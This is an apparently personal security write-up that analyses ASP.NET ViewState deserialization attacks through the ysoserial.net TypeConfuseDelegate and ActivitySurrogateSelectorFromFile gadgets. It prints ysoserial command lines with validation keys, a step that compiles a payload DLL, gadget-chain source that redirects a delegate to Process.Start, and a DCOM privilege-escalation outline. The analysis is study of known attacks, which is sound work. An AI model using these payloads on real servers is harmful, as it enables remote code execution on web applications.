# Intro
This writeup was inspired by the following [blog](https://cyku.tw/play-with-dotnet-viewstate-exploit-and-create-fileless-webshell/) that discusses .NET ViewState Exploitation. In this writeup, I explored the TypeConfuseDelegate and ActivitySurrogateSelectorFromFile [ysoserial.net](https://github.com/pwntester/ysoserial.net) gadgets, the gadgets most commonly used to exploit ViewState and gain RCE.
The writeup also slightly touches upon the concept of COM and .NET Interoperabilities that serves as a foundation of the gadgets, and a lot of .NET documentations. Enjoy reading!
# ViewState Basics
### MAC Enabled=true + Invalid ViewState
### About ViewStateUserKey
- Used to prevent CSRF attacks.
- `ViewStateUserKey` is typically set to a value such as the current user’s username or the user's session identifier.
- Sample scenario:
- A client has two tabs open in a browser.
- Tab 1: Logs in as user A, `__VIEWSTATE` with A's `ViewStateUserKey` is rendered.
- Tab 2: Client logs out, logs in as User B, goes back to Tab 1 and submit the form.
- Submitted `ViewStateUserKey` is A's, but on the server's side is B's, mismatch causing error.
ViewState References:
* https://www.c-sharpcorner.com/UploadFile/225740/what-is-view-state-and-how-it-works-in-Asp-Net53/
* https://www.c-sharpcorner.com/uploadfile/37db1d/looking-deep-inside-postback-and-viewstate-in-Asp-Net-3-5/
# TypeConfuseDelegate
This payload successfully writes a file, but shows 500 Internal Server Error
Hence, we might not verify whether the file is successfully written.
```
.\ysoserial.exe -p ViewState -g TypeConfuseDelegate \ `
-c "echo ViewStatePwned > C:\pwn.txt" --generator="8E2672C3" \ `
--validationalg="SHA1" \ `
--validationkey="A9F13C7FCD4B1AB1234567890ABCDEF1234567890ABCDEF1234567890ABCDEF1"
```
Take Note:
- It calls `HiddenFieldPageStatePersister Class`
- Inheritance: `Object` --> `PageStatePersister` --> `HiddenFieldPageStatePersister`
# ActivitySurrogateSelectorFromFile
## Passing .cs and supporting .dll files
```
ysoserial.exe -p ViewState -g ActivitySurrogateSelectorFromFile \
-c "ExploitClassCykuModified.cs;./dlls/System.dll;./dlls/System.Web.dll" \
--generator="2B617B51" --validationalg="SHA1" \
--validationkey="A9F13C7FCD4B1AB1234567890ABCDEF1234567890ABCDEF1234567890ABCDEF1"
```
**Error: Unable to cast object of type 'State' to 'System.Web.UI.Pair'**
What this indicates:
- The top-level object passed in the ViewState parameter is of type 'State'
- ASP.NET ViewState expects to work with 'System.Web.UI.Pair'
## Passing .dll from a Compiled .cs
Convert the .cs file to .dll
```
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" \
/target:library /out:C:\inetpub\wwwroot\payloadcyku.dll \
C:\Users\Michelle\Desktop\ysoserial1\ysoserial.exe\ExploitClassCykuModified.cs
```
Pass the converted payload to ysoserial
```
ysoserial.exe -p ViewState -g ActivitySurrogateSelectorFromFile \
-c "C:\inetpub\wwwroot\payloadcyku.dll" --generator="2B617B51" \
--validationalg="SHA1" \
--validationkey="A9F13C7FCD4B1AB1234567890ABCDEF1234567890ABCDEF1234567890ABCDEF1"
```
## Why one works and the other does not?
Two main questions:
1. Does passing a .cs file along with supporting .dll unable to result in a Pair object?
2. If so, does this fail because of:
- ASP.NET ViewState deserialization expects a Pair object, or
- ActivitySurrogateSelectorFile expects to work with Pair objects?
### Analyzing ActivitySurrogateSelectorFile
The `Generate()` function in ActivitySurrogateSelectorFromFileGenerator.cs calls `GadgetChainsToBinaryFormatter()` from ActivitySurrogateSelectorGenerator.cs
The `GadgetChainsToBinaryFormatter()` instantiates a new object from `GadgetChains()`
`GadgetChains()` itself makes use of Hashtable, IEnumerator, etc.
Hashtable itself is a collection of key/value pairs, will it have anything to do with the errors?
Not necessarily.
#### Reason #1: The error message explicitly states it is related to casting and ViewState.
Referencing this article: https://googleprojectzero.blogspot.com/2017/04/
- ActivitySurrogateSelector does make use of hashtable to trigger IEnumeration so our payload gets deserialized, but that happens before we pass the final payload to ViewState.
- If an error about Pair occurs, it’s due to the top-level object in the serialized payload not being a Pair, which only becomes a problem at deserialization time (on the server).
```
ysoserial payload generation (Hashtable/IEnumeration happens here)
->
HTTP request
->
ASP.NET ViewState processing (Pair casting error happens here)
```
#### Reason #2: The gadget chain behavior itself
ActivitySurrogateSelector does not necessarily expect to work with Pair Objects.
See ActivitySurrogateSelector analysis for detailed walkthrough.
### Analyzing ASP.NET ViewState Handler
As far as I know, ViewState deserialization uses `ObjectStateFormatter()`, making it able to deserialize any objects (?)
Further analyzing how ViewState works, apparently it uses `LoadPageStateFromPersistenceMedium`, which uses `PageStatePersister.Load`
Recall that when using `TypeConfuseDelegate`, an error message about the `HiddenFieldPageStatePersister` occurs
Taking a look at the `PageStatePersister.Load()` Method, we see a deserialization in action, which will cast the result into `Pair`
```
public override void Load()
{
Stream stateStream = GetSecureStream();
// Read the state string, using the StateFormatter.
StreamReader reader = new StreamReader(stateStream);
IStateFormatter formatter = this.StateFormatter;
string fileContents = reader.ReadToEnd();
// Deserilize returns the Pair object that is serialized in
// the Save method.
Pair statePair = (Pair)formatter.Deserialize(fileContents);
ViewState = statePair.First;
ControlState = statePair.Second;
reader.Close();
stateStream.Close();
}
```
Few things to note:
- PageStatePersister.Load() is called to load ViewState from a persistence medium.
- It uses an `IStateFormatter` to deserialize ViewState data
- The deserialized object is casted to `Pair` to initialize the `ViewState` and `ControlState` property
- The pattern will be: `Pair(pageViewState, controlState)`
Some few imformation from .NET documentation:
> By default, ASP.NET page state is serialized and deserialized by an instance of the ObjectStateFormatter class; however, site and adapter developers can implement the IStateFormatter interface on their own types to perform this work.
About the ObjectStateFormatter Class:
> Other types not listed above are binary-serialized using a BinaryFormatter object if they implement the ISerializable interface or are decorated with the SerializableAttribute attribute.
Notice that we are deserializing a class (not listed in the list stated in [reference](https://learn.microsoft.com/en-us/dotnet/api/system.web.ui.objectstateformatter?view=netframework-4.8.1)). So our object will be deserialized by BinaryFormatter.
Which makes sense, since ysoserial `ActivitySurrogateSelector` gadget itself serialized the payload using BinaryFormatter
```
MemoryStream stm = new MemoryStream();
if (inputArgs.Minify)
{
ysoserial.Helpers.ModifiedVulnerableBinaryFormatters.BinaryFormatter fmtLocal = new ysoserial.Helpers.ModifiedVulnerableBinaryFormatters.BinaryFormatter();
fmtLocal.SurrogateSelector = new MySurrogateSelector();
fmtLocal.Serialize(stm, ls);
}
else
{
System.Runtime.Serialization.Formatters.Binary.BinaryFormatter fmt = new System.Runtime.Serialization.Formatters.Binary.BinaryFormatter();
fmt.SurrogateSelector = new MySurrogateSelector();
fmt.Serialize(stm, ls);
}
return stm.ToArray();
```
Conclusion:
- The error: `Unable to cast object of type 'State' to 'System.Web.UI.Pair'` happens when casting the deserialized object
- When passing a .cs file, ysoserial compiles it and wraps it in a State object, which becomes the top-level serialized instance — breaking the ASP.NET ViewState assumption.
- Execution path:
> 1. Page.LoadPageStateFromPersistenceMedium()
> 2. PageStatePersister.Load()
> 3. IStateFormatter.Deserialize() → Expects: Pair object
- This has nothing to do with the internals of the gadget itself (the early assumption of SortedKey's and Hashtable's relevance to Pair objects)
- ObjectStateFormatter takes many types of data structures, the Pair fails because of the type casting
Confusion: Why .dll works, .cs does not?
- When you pass a compiled .dll, ysoserial loads the class from the DLL, instantiates it, and plugs the object into the ActivitySurrogateSelectorFromFile gadget chain. This chain is then wrapped in a System.Web.UI.Pair, as required by ViewState deserialization.
- ysoserial.exe cannot compile the .cs file on its own — it expects a DLL, not source code. So if it works at all when you pass a .cs and .dll, it must be because: The DLL is doing the real work, or the .cs was previously compiled, cached, or accidentally referenced through a different mechanism.
# Analyzing The Gadgets
## Background Knowledge
### Managed and Unmanaged Code
- Managed code: execution is managed by a runtime (CLR: comple managed code to machine code and executing it)
- C#, VB.NET
- Unmanaged code: Programmer manages memory to security considerations
- C++, VBG
### COM (unmanaged) vs. .NET (managed)
- Object Lifetime
- COM: Client manages when to free/release the object.
- .NET: CLR automatically cleans up objects with GC.
- Discovering Capabilities
- COM: Requests interface, receives interface pointer if available.
- .NET: Use reflection to see all properties, methods, and interfaces of the objects.
- Memory Management
- COM: Expects the object to stay in one place, no mechanism to deal with dynamic object location.
- .NET: Objects reside in memory managed by .NET runtime execution environment, moves in memory for performance reasons.
### COM and .NET Interoperabilities
Interoperability: Passing the code between managed and unmanaged boundaries.
- .NET might not be COM, but should be able to interoperate with COM
- .NET can implement and consume COM objects
- These interoperabilities are supported by Runtime Callable Wrapper (RCW) and COM Callable Wrapper (CCW)
### Sample: Out-of-Process COM Server in C#
**Server Implementation**
> This is a .NET Object
**Client Implementation**
- Unmanaged COM client (C++)
```C++
ICustomInterface* pObj = NULL;
CLSID clsid;
hr = CLSIDFromProgID(L"MyNamespace.COMObject", &clsid);
hr = CoCreateInstance(clsid, NULL, CLSCTX_LOCAL_SERVER, IID_ICustomInterface, (void**)&pObj);
pObj->DoSomething();
```
> Requests interface and receives interface pointer (if available).
- Managed client (C# via COM Interop)
```C#
Type comType = Type.GetTypeFromProgID("MyNamespace.COMObject");
object comObj = Activator.CreateInstance(comType);
comObj.GetType().InvokeMember("DoSomething", System.Reflection.BindingFlags.InvokeMethod, null, comObj, null);
```
> Use System.Reflection to see all information about the loaded assemblies (the objects).
### How CCW Works As A Translator
- When COM client calls a .NET object, a CCW is needed as a translator between COM and .NET.
- The CCW is automatically created by the .NET runtime.
- CCW makes the .NET object look like a native COM object to the COM client.
To Query Interface
```C++
IUnknown* pUnknown;
HRESULT hr = CoCreateInstance(..., IID_IUnknown, (void**)&pUnknown);
IDispatch* pDisp;
hr = pUnknown->QueryInterface(IID_IDispatch, (void**)&pDisp);
```
> 1. Instantiates a COM object using its CLSID, requests the object to return a pointer to IUnknown interface, pUnknown will point to the COM's IUnknown vtable
> 2. Now having pointer to IUnknown, use QueryInterface to get IDispatch pointer (pDisp)
### Now What If The Caller is .NET Client?
> Simply put, when .NET runtime gets hold of a COM object, it will go through a "process" to determine if it can unwrap the object from its CCW and avoid creating an RCW.
> The process is illustrated above
> It might end up calling BinaryFormatter::Deserialize()!
### Attacker's Perspective (Local Privilege Escalation)
**Make the server to try and create an RCW, for a serializable .NET object that is exposed over COM (the above inner box containing ".NET Object").**
**This abuses WMI**
> The server itself is not vulnerable, until it acts as a DCOM client: retrieving and deserializing attacker-controlled data.
Trick:
- Pass a .NET COM object to the server's `Equals` method
- The runtime tries to convert to RCW
- Runtime checks if it's a CCW wrapped .NET object, resulting in calling `GetSerializedBuffer`
- Send a serialized `Hashtable` to the server containing delegate object as one of the keys.
- The server contains COM implementation of the `IHashCodeProvider` Interface
- Custom deserialization code causes `IHashCodeProvider::GetHashCode` to be called, rebuilding the internal hash structures, running over each keys.
- The function meets the Delegate object (which is serializable), so it will gets passed back to the client (refer to the diagram above)
- The client is written in native code, so `IManagedObject` automatic serialization won't occur.
- The Delegate object is in the server while we are exposed to the CCW.
- Make a call via CCW to start a new process with server's privileges.
> The .NET COM Server becomes a DCOM client when it calls a method (GetHashCode) on a COM Interface, which is implemented by a remote object controlled by the attacker.
> The serialized hashtable contains the COM implementation (not .NET!!!) of the IHashCodeProvider, causing the .NET COM Server to be a DCOM Client when calling the method.
> Works in local privilege escalation but not guaranteed for RCE.
## TypeConfuseDelegate
### Key Idea
Creates a `String.Compare` delegate, multicasts it to later create type confusion, then uses this multicast delegate as a comparer in a `SortedSet` Object.
Sets the attacker's payload inside the `SortedSet`, then modifies the delegate's invocation list to call `Process.Start()`.
### How It Works
#### Step 1: Get user's input arguments
```C#
string cmdFromFile = inputArgs.CmdFromFile;
if (!string.IsNullOrEmpty(cmdFromFile)) {
inputArgs.Cmd = cmdFromFile;
}
```
#### Step 2: Create a Multicast Delegate
```C#
Delegate da = new Comparison<string>(String.Compare);
Comparison<string> d = (Comparison<string>)MulticastDelegate.Combine(da, da);
```
> Multicast delegate contains a list of the assigned delegates
> When the multicast delegate is called, it invokes the delegates in the list in order.
> The types must match first so it will be valid in the ComparisonComparer, afterwards we can modify the Invoke List 1 to System.Process.Start
#### Step 3: Create a ComparisonComparer instance with the delegate
```C#
IComparer<string> comp = Comparer<string>.Create(d);
```
> ComparisonComparer performs a case-sensitive comparison of two objects with the same type
> Hence, since the multicast delegate contains two same types, it is valid.
#### Step 4: Add user's arguments to the SortedSet
```C#
SortedSet<string> set = new SortedSet<string>(comp);
set.Add(inputArgs.CmdFileName);
if (inputArgs.HasArguments) {
set.Add(inputArgs.CmdArguments);
}
else {
set.Add("");
}
```
#### Step 5: Modify the multicast delegate's list of invocation
```C#
FieldInfo fi = typeof(MulticastDelegate).GetField("_invocationList", BindingFlags.NonPublic | BindingFlags.Instance);
object[] invoke_list = d.GetInvocationList();
// Modify the invocation list to add Process::Start(string, string)
invoke_list[1] = new Func<string, string, Process>(Process.Start);
fi.SetValue(d, invoke_list);
```
#### Why specifically modify `_invocationList[1]`?
- Upon object construction, `DelegateSerializationHolder.GetRealObject()` will be called.
- The above function treats the first element of the delegate list (`_invokeList[0]`) as the type for the entire MultiCastDelegate object.
```C#
return ((MulticastDelegate)array[0]).NewMulticastDelegate(array, array.Length);
```
- We want to keep the type ``Comparison<string>``.
## ActivitySurrogateSelector
### Key Idea
Generates an enumerable (hashtable) via `LINQ`, serializes it using `ObjectSurrogate`, forces enumeration to trigger deserialization via the `ToString()` method.
### How It Works
#### Step 1: Hashtable construction
- Create the gadget chains in the form of `IEnumerable`
```C#
byte[][] e1 = new byte[][] { assemblyBytes };
IEnumerable<Assembly> e2 = CreateWhereSelectEnumerableIterator<byte[], Assembly>
(e1, null, Assembly.Load);
IEnumerable<IEnumerable<Type>> e3 = CreateWhereSelectEnumerableIterator<Assembly, IEnumerable<Type>>
(e2, null, (Func<Assembly, IEnumerable<Type>>)Delegate.CreateDelegate(typeof(Func<Assembly, IEnumerable<Type>>), typeof(Assembly).GetMethod("GetTypes")));
IEnumerable<IEnumerator<Type>> e4 = CreateWhereSelectEnumerableIterator<IEnumerable<Type>, IEnumerator<Type>>
(e3, null, (Func<IEnumerable<Type>, IEnumerator<Type>>)Delegate.CreateDelegate(typeof(Func<IEnumerable<Type>, IEnumerator<Type>>), typeof(IEnumerable<Type>).GetMethod("GetEnumerator")));
IEnumerable<Type> e5 = CreateWhereSelectEnumerableIterator<IEnumerator<Type>, Type>
(e4, (Func<IEnumerator<Type>, bool>)Delegate.CreateDelegate(typeof(Func<IEnumerator<Type>, bool>), typeof(IEnumerator).GetMethod("MoveNext")), (Func<IEnumerator<Type>, Type>)Delegate.CreateDelegate(typeof(Func<IEnumerator<Type>, Type>), typeof(IEnumerator<Type>).GetProperty("Current").GetGetMethod()));
IEnumerable<object> end = CreateWhereSelectEnumerableIterator<Type, object>(e5, null, Activator.CreateInstance);
```
- Create a new instance of `DesignerVerb` and `IDictionary`
```C#
PagedDataSource pds = new PagedDataSource() { DataSource = end };
dict = (IDictionary)Activator.CreateInstance(typeof(int).Assembly.GetType("System.Runtime.Remoting.Channels.AggregateDictionary"), pds);
verb = new DesignerVerb("", null);
typeof(MenuCommand).GetField("properties", BindingFlags.NonPublic | BindingFlags.Instance).SetValue(verb, dict);
```
> DesignerVerb and IDictionary is used hand-in-hand to trigger ToString()
> Will result in the LINQ enumerator being walked
- Initialize a normal empty list.
```C#
ls = new List<object>();
```
- Populate the list with the pre-loaded gadget chains.
```C#
ls.Add(e1);
ls.Add(e2);
ls.Add(e3);
ls.Add(e4);
ls.Add(e5);
ls.Add(end);
ls.Add(pds);
ls.Add(verb);
ls.Add(dict);
```
> This becomes a list of IEnumerable elements.
- Initialize a Hashtable
```C#
ht = new Hashtable();
```
- Replace the Hashtable's existing keys with `DesignerVerb`
```C#
FieldInfo fi_keys = ht.GetType().GetField("buckets", BindingFlags.NonPublic | BindingFlags.Instance);
Array keys = (Array)fi_keys.GetValue(ht);
FieldInfo fi_key = keys.GetType().GetElementType().GetField("key", BindingFlags.Public | BindingFlags.Instance);
for (int i = 0; i < keys.Length; ++i)
{
object bucket = keys.GetValue(i);
object key = fi_key.GetValue(bucket);
if (key is string)
{
fi_key.SetValue(bucket, verb);
keys.SetValue(bucket, i);
break;
}
}
fi_keys.SetValue(ht, keys);
```
> So ToString() method could be triggered since the key is not a string
- Add the modified Hashtable to the list
```C#
ls.Add(ht);
```
#### Step 2: Serialize the list
- List serialization
```C#
System.Runtime.Serialization.Formatters.Binary.BinaryFormatter fmt = new System.Runtime.Serialization.Formatters.Binary.BinaryFormatter();
fmt.SurrogateSelector = new MySurrogateSelector();
fmt.Serialize(stm, ls);
```
- And serialize our input arguments passed via ysoserial
```C#
return Serialize(payload, formatter, inputArgs);
```
> The result is what we will pass to the server.
#### Step 3: Server receives the payload
- The Hashtable will get deserialized and all keys will be rehashed.
- If two same keys are found upon rebuilding, an exception will be thrown.
- The exception will end up calling `GetResourceString` and attempt to format the keys.
- If the key is not a `String` type (since we modified it), it will trigger the `ToString()` method, firing up our gadget chain.
### Summary
- Delegates: A type that represents references to methods with a particular parameter list and return type.
- We create an open delegate, which not bound to an instance and needs to be passed explicitly at invocation.
- In the end, each `Type` in `e5` is passed to `Activator.CreateInstance(Type)`
# References:
* https://learn.microsoft.com/en-us/dotnet/api/system.web.ui.pagestatepersister.load?view=netframework-4.8.1
* https://learn.microsoft.com/en-us/dotnet/api/system.web.ui.pagestatepersister?view=netframework-4.8.1
* https://learn.microsoft.com/en-us/dotnet/api/system.web.ui.hiddenfieldpagestatepersister?view=netframework-4.8.1
* https://learn.microsoft.com/en-us/dotnet/api/system.web.ui.pagestatepersister?view=netframework-4.8.1
* https://learn.microsoft.com/en-us/dotnet/api/system.web.ui.istateformatter?view=netframework-4.8.1
* https://learn.microsoft.com/en-us/dotnet/api/system.web.ui.objectstateformatter?view=netframework-4.8.1
* https://github.com/pwntester/ysoserial.net/blob/master/ysoserial/Generators/ActivitySurrogateSelectorFromFileGenerator.cs
* https://support.microsoft.com/en-us/topic/resolving-view-state-message-authentication-code-mac-errors-6c0e9fd3-f8a8-c953-8fbe-ce840446a9f3
* https://learn.microsoft.com/en-us/dotnet/framework/interop/com-interop-sample-com-client-and-net-server?source=recommendations
* https://learn.microsoft.com/en-us/dotnet/csharp/programming-guide/delegates/how-to-combine-delegates-multicast-delegates
* https://testbnull.medium.com/deep-inside-typeconfusedelegate-gadgetchain-456915ed646a
* https://testbnull.medium.com/c%C3%B3-g%C3%AC-b%C3%AAn-trong-c%C3%A1c-net-deser-gadgetchain-3d89897c4878
* https://learn.microsoft.com/en-us/dotnet/api/system.collections.comparer.compare?view=net-9.0
* https://www.troyhunt.com/understanding-and-testing-for-view/
Sign in with Wallet
Connect another wallet